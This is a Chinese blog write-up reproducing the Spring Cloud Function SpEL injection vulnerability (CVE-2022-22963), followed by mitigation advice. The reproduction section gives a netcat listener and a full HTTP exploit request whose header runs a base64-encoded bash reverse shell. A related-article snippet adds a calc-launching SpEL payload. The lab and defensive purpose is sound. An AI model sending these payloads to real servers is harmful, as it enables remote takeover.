Spring Cloud Function SpEL表达式注入漏洞复现

最新推荐文章于 2023-01-30 09:53:46 发布
最新推荐文章于 2023-01-30 09:53:46 发布
阅读量3.9k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: Spring SpEL 表达式注入 springcloud spring漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wdearzh/article/details/123984519
版权

漏洞描述

Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。

影响版本

Spring Cloud Function SPEL表达式注入漏洞影响范围:
3 <= spring-cloud-function-context <= 3.2.2
3 <= spring-cloud-function-core <= 3.2.2

编译环境

1、在IDEA中选择新建项目,然后选择Spring Initializr,输入随机项目名称,然后选择java版本和jdk版本后点击下一步。
2、选择Spring WebFunction作为依赖项,点击完成。
3、配置pom.xml,添加漏洞组件版本号

            <groupId>org.springframework.cloud</groupId>
            <artifactId>spring-cloud-function-web</artifactId>
            <version>3.2.2</version>

4、 在src\main\resources\application.properties增加如下修改端口

server.port=80

如果本地复现,可以直接在idea中运行项目即可。如果要放到服务器上复现,可以编译成jar包。参照后面的步骤。
5、编译配置
5.1 修改pom.xml,增加finalName

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
        <finalName>springcloudspel</finalName>
    </build>

5.2 选择右边的mavn 找打项目 Lifecycle下的package打包。
6、将jar包放到服务器执行。

漏洞复现

服务器运行测试程序:
在这里插入图片描述
本地开监听

nc -lvnp 88

发送exp

POST /functionRouter HTTP/1.1
Host: 127.0.0.1
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODggMD4mMQo=}|{base64,-d}|{bash,-i}")
Content-Type: application/x-www-form-urlencoded
Content-Length: 3

xxx

触发反弹shell:
在这里插入图片描述

缓解措施

高危:目前漏洞细节和利用代码已经公开,攻击者可利用该漏洞远程在目标系统上执行任意代码,建议使用相关系统的用户尽快采取安全措施。
1、检测:
对使用了spring-cloud-function-context 组件的项目代码进 行排查,可用以下命令查看版本:
grep-A 2’spring-cloud-function-context’pom.xml
grep-A 2’spring-cloud-function-core’pom.xml
若当前版本在受影响范围内,则存在安全风险。
2、处置:
更新Spring Cloud Function到3.2.3。

丶拾光_w4ngz
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 批量检测脚本:python Spel_RCE_POC.py url.txt 反弹shell脚本:python Spel_RCE_Bash_EXP.py url lhost lport 受影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞
最新发布
12-26
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞
Spring spel表达式使用方法示例
08-29
主要介绍了Spring spel表达式使用方法示例,通过一些实例向大家展示了spel表达式的用法,需要的朋友可以了解下。
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
07-08
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
Spring Cloud Function Spel表达式注入
m0_67390963的博客
08-24 799
Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),支持基于SpEL的函数式动态路由。在特定配置下,3
spring cloud (五)spring cloud 版本
AmbroseLe
03-19 266
平时比较常见的版本号 软件版本号:2.0.2.RELEASE 2:主版本号。当功能模块有较大更新或者整体架构发生变化时,主版本号会更新 0:次版本号。次版本表示只是局部的一些变动。 2:修改版本号。一般是bug的修或者是小的变动 RELEASE:希腊字母版本号。次版本号用户标注当前版本的软件处于哪个开发阶段 希腊字母版本号 Base:设计阶段...
Spring Cloud Function Spel表达式注入漏洞分析
m0_67391120的博客
08-24 837
简单了解了一下FaaS的的函数交付模式,和之前研究的容器安全场景下的微服务架构非常的契合,以往的大多数环境主要通过虚拟机交付逐渐演变了成了VPS、容器、API到在的函数即服务;找到对应方法的RoutingFunction.class的文件内容,定位到对应的第80行的代码出,可以发该方法主要Message的内容已经被传递过来;相关的配置项目可以在pom.xml当中进行修改,从项目当中可以看到依赖的组件版本为3.2.2是存在漏洞的版本,即可直接启动项目,无需其他的修改;
Spring Boot与Spring Cloud等的版本对应
小羽毛的博客
05-07 3727
一、概述 从使用Spring Boot开始,Spring Boot和Spring Cloud在不断的更新中,社区也很是活跃。到2019年,Spring Cloud推出了Greenwich版本,问题也来了——目前正在使用Spring Cloud和欲尝试使用Spring Cloud的人,对版本肯定是关注的,不同版本之间兼容性不一样,对以后的开发带来的效应也很可能不一样。所以我觉得很有...
Spring Cloud Function SPEL表达式注入漏洞
xhwfa的博客
04-20 3498
漏洞编号:CVE-2022-22963 一、漏洞简述 Spring Cloud Function 是基于Spring Boot的函数计算框架(FaaS),该项目提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像Amazon AWS Lambda 这样的 FaaS(函数即服务,function as a service)平台。它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 在版本3.0.0到当前最新版本3.2.2(commit dc5128b),默
漏洞-CVE-2022-22963-Spring Cloud Function SpEL RCE 远程代码执行漏洞
m0_65454485的博客
08-08 1706
漏洞-CVE-2022-22963-Spring Cloud Function SpEL RCE 远程代码执行漏洞
SPRING CLOUD FUNCTION SPEL表达式注入漏洞测试服务端程序
03-30
用于Spring Cloud Function SPEL表达式注入漏洞测试环境搭建,是编译好的服务端程序,命令号java -jar *.jar运行即可,服务端运行在127.0.0.1:8080端口
漏洞挖掘之Spring Cloud注入漏洞
m0_67391377的博客
08-31 320
springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。6、应急响应笔记 7、 网络安全学习路线。..
Spring Cloud 介绍及使用
Littewood的博客
07-13 773
Springcloud介绍及使用
『Java CVE』CVE-2022-22963: Spring Cloud Function SPEL表达式注入RCE
Ho1aAs‘s Blog
07-28 1390
## 漏洞简介 向`/functionRouter`路由发送headers带有`spring.cloud.function.routing-expression`键的POST包时,会触发SPEL解析该键值 ## 影响范围 3.0.0
Spring Cloud
guoguo0717的博客
03-31 433
Spring Cloud:[klaʊd] Spring Cloud是什么? Spring Cloud 是一系列框架的有序集合。它利用 Spring Boot 的开发便利性,巧妙地简化了分布式系统基础设施的开发,如服务注册、服务发、配置中心、消息总线、负载均衡、断路器、数据监控等,这些都可以用 Spring Boot 的开发风格做到一键启动和部署。 通俗地讲,Spring Cloud 就是用于构建微服务开发和治理的框架集合(并不是具体的一个框架),主要贡献来自 Netflix OSS。 Spring Clo
Spring Cloud Function SpEL 表达式命令注入漏洞及利用
Tauil的博客
07-26 893
在源码中可以看到,未修改前的代码中spring.cloud.function.routing-expression参数被functionFromExpression接口中的getValue进行处理,该方法使用了StandardEvaluationContext来进行解析SeEL表达式,从而形成了注入漏洞。时,会触发RoutingFunction逻辑,在SpringCloudFunction中,RoutingFunction类的apply方法会将请求头中的。另启一个终端,再终端中输入。...
CVE-2022-22963 SpringCloud Function SpEL注入漏洞分析
阿道夫的博客
01-30 2067
在研究分析了CVE-2022-22980 Spring Data MongoDBSpEL表达式注入漏洞之后,想起之前在spring4shell爆出之前,存在于SpringCloudFunction中的一个SpEL表达式注入漏洞,编号为CVE-2022-22963。在这里对其进行一波分析和学习。
Spring Cloud Function SPEL表达式注入漏洞(CVE-2022-22963)
chaojixiaojingang
04-06 7535
1.漏洞描述 SpringCloudFunctionSpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 2.影响版本 Spring Cloud Function 3.0.0 <...
【Nday】Spring-Cloud-SpEL-RCE漏洞
wwang135的博客
03-30 4394
Spring-Cloud-SpEL-RCE漏洞
SpringBoot SpEL表达式注入漏洞-分析与
06-02
SpringBoot SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码,从而导致应用被攻击。下面我将对该漏洞进行分析与。 一、漏洞分析 SpringBoot中的SpELSpring Expression Language)是一种基于表达式的语言,用于在运行时动态地计算值或执行逻辑。SpEL表达式可以用于访问对象的属性、调用对象的方法、进行条件判断等操作。在SpringBoot中,SpEL表达式可以用于注解中的属性值、配置文件中的属性值等场景。 在SpEL表达式中,可以使用一些特殊的语法来引用Bean对象或调用Bean对象的方法。例如,可以使用`#{beanName.methodName()}`的语法来调用Bean对象的方法。如果在SpEL表达式中使用了未经过滤的用户输入,就会存在SpEL表达式注入漏洞。 攻击者可以通过构造恶意的SpEL表达式,将其注入到应用中,从而执行恶意代码。例如,可以将`#{T(java.lang.Runtime).getRuntime().exec('calc')}`注入到应用中,从而在受害者机器上执行计算器程序。 二、漏洞 下面我将通过一个简单的漏洞来说明SpEL表达式注入漏洞的危害性。 1. 创建一个SpringBoot应用 首先,我们需要创建一个SpringBoot应用。可以使用Spring Initializr来快速创建一个基本的SpringBoot应用。 2. 添加注解 在创建好的SpringBoot应用中,我们可以添加一个Controller类,并在其中添加一个RequestMapping注解。在RequestMapping注解中,我们可以使用SpEL表达式来引用Bean对象或调用Bean对象的方法。 ```java @RestController public class MyController { @RequestMapping("/test") public String test() { return "hello world"; } @RequestMapping(value = "/{name}", method = RequestMethod.GET) public String sayHello(@PathVariable("name") String name) { return "Hello " + name + "!"; } @RequestMapping(value = "/spel", method = RequestMethod.GET) public String spel() { String expression = "#{T(java.lang.Runtime).getRuntime().exec('calc')}"; ExpressionParser parser = new SpelExpressionParser(); Expression exp = parser.parseExpression(expression); return exp.getValue().toString(); } } ``` 在上述代码中,我们在/spel接口中使用了SpEL表达式来调用Runtime.getRuntime().exec方法,从而执行计算器程序。 3. 启动应用 启动应用后,访问/spel接口,可以看到计算器程序被成功执行。 4. 防范措施 为了防范SpEL表达式注入漏洞,我们可以采取以下措施: 1. 对用户输入进行过滤和验证,避免未经过滤的用户输入被注入SpEL表达式中。 2. 尽量避免在注解或配置文件中使用SpEL表达式。 3. 对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。 4. 在应用中禁用动态表达式功能,避免SpEL表达式被执行。 5. 总结 SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码。为了防范该漏洞,我们需要对用户输入进行过滤和验证,避免未经过滤的用户输入被注入SpEL表达式中。同时,尽量避免在注解或配置文件中使用SpEL表达式,对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丶拾光_w4ngz

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值